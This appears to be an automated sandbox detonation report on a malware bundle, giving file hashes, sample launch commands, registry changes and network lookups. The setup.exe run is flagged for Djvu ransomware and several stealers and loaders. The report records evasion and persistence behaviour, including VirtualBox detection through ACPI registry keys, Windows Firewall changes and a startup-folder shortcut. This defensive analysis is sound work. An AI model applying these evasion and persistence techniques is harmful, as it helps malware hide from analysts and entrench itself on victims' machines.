SHA512 16d97946a5637d4c73104005f5dc2005088cc8f864aa87eabc9764f173281fee76880bfb7549716f16a5486971dddd8dac50ce4963bbb231a8f95b704bc0586a

memory/2040-1087-0x0000000073FA0000-0x000000007468E000-memory.dmp

C:\Users\Admin\Documents\GuardFox\I10Bs31inqsmkmzmxnpAQrv9.exe

MD5 e310dd02f60bd39f7754bbd048ed9ab1
SHA1 fe5000fcb8089fb6df1765e4f8ee058e306af55e
SHA256 a7156dd3ffde626580e97668ab180b4f323dc6d45a4eb82cd322bb1447a57cd7
SHA512 2ba93386f12e53c6540c94db73fbaf644f4b56dc04c40451a95f7cf107627a0ce0e3f526c3e4ebdecf30c7bb005f4d41636ae8451d8f9f899adca9703f747855

C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdescs.new

MD5 3e7c7c9bb95aed0eecb0c2c958afcbb1
SHA1 ed25976e78654a721f2df32118293fa8fccfac79
SHA256 559165126d6d699c5d3ec8242f2c96d79ec56e121264aa4d1424c0b36c47a046
SHA512 f42eaec7c49d7986d5cce56cde4d6c5bdc0fec079d6edc7755b7789d4df419edf62e48856ec6a084325238f3421ff14198a43ac876649b5bbce29c288fc9e298

C:\Users\Admin\Documents\GuardFox\v7aJoARLTh66sOaiUGezYuxG.exe

MD5 34414db88b6995ec1fbf40d93c720605
SHA1 ef16204fbc16b7ab2e644b8336babcfcc5a43478
SHA256 5a0fa1cdea8b4c3582226a7367eab18e8d4c303a07eb83f5c395f65bf441aae9
SHA512 c168f71cd0c4c493ef1819a6e5b40c8a6872aee34304ca108846fcf8da2a09e6b1bb070d79498750a149d8c4e0a0d02f99c9a99e471cc283614b6fab1c1c91b3

memory/1580-1132-0x0000000000CB0000-0x0000000001A33000-memory.dmp

\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\Users\Admin\AppData\Local\Temp\38DD.exe

MD5 931b31b03a14bd25615834377b2ed256
SHA1 899a7e209d3d7e919cf346a49b0bc0877f738383
SHA256 1bd7aedd5fcd9f921d0ee481f98a276603447b9721870b8aa13380d4f438c320
SHA512 ba6b9063fbe70228122f83bdeb70201e9859fd0362c8295b990bf2ae15e04561ee8513b7a0023a58de0ea50e3670a7b815f4afa457203de26a7214ec41ce0a35

memory/1088-1158-0x0000000000DA0000-0x0000000000DA1000-memory.dmp

memory/1088-1246-0x0000000000AC0000-0x0000000000AC1000-memory.dmp

memory/1088-1255-0x0000000000DF0000-0x0000000000DF1000-memory.dmp

memory/1088-1272-0x00000000029A0000-0x00000000029A1000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-23 17:45

Reported

2024-02-23 17:48

Platform

win10v2004-20240221-en

Max time kernel

146s

Max time network

154s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\file_release_4.rar

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2200714112-3788720386-2559682836-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2200714112-3788720386-2559682836-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1400 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 1400 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\file_release_4.rar

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\file_release_4.rar"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 204.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 186.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 9.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-02-23 17:45

Reported

2024-02-23 17:48

Platform

win7-20240221-en

Max time kernel

121s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"

Signatures

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe

"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"

Network

N/A

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-02-23 17:45

Reported

2024-02-23 17:49

Platform

win7-20240221-en

Max time kernel

123s

Max time network

134s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1120 wrote to memory of 2476 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1120 wrote to memory of 2476 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1120 wrote to memory of 2476 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1120 wrote to memory of 2476 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1120 wrote to memory of 2476 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1120 wrote to memory of 2476 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1120 wrote to memory of 2476 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-02-23 17:45

Reported

2024-02-23 17:48

Platform

win10v2004-20240221-en

Max time kernel

147s

Max time network

154s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

Signatures

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods\ = "3" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib\ = "{346F8AC1-CEB1-4E3E-944B-87D9840505C3}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ThreadingModel = "Both" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer\ = "ICQLiteShell.MCLiteShellExt.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\WOW6432Node\Interface C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods\ = "7" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\WOW6432Node\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID\ = "ICQLiteShell.MCLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "MIBLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "PSFactoryBuffer" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ = "IMCLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\ = "ICQLiteShell 1.0 Type Library" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID\ = "ICQLiteShell.MCLiteShellExt.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS\ = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2852 wrote to memory of 4464 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2852 wrote to memory of 4464 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2852 wrote to memory of 4464 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 205.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 171.117.168.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-02-23 17:45

Reported

2024-02-23 17:48

Platform

win10v2004-20240221-en

Max time kernel

91s

Max time network

153s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1100 wrote to memory of 5084 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1100 wrote to memory of 5084 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1100 wrote to memory of 5084 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 205.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 198.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 179.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-02-23 17:45

Reported

2024-02-23 17:49

Platform

win10v2004-20240221-en

Max time kernel

138s

Max time network

158s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4780 wrote to memory of 1416 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4780 wrote to memory of 1416 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4780 wrote to memory of 1416 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1416 -ip 1416

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 588

Network

Country Destination Domain Proto
US 138.91.171.81:80 tcp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 206.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 190.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 196.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 171.117.168.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-02-23 17:45

Reported

2024-02-23 17:51

Platform

win10v2004-20240221-en

Max time kernel

166s

Max time network

289s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Lumma Stealer

stealer lumma

RisePro

stealer risepro

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

ZGRat

rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS1A40.tmp\Install.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS1A40.tmp\Install.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Documents\GuardFox\PRPSLOJESuJHQLjldDsEWa5D.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\aOiKcNVG4FAxtldCM7_Aj8fa.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe N/A
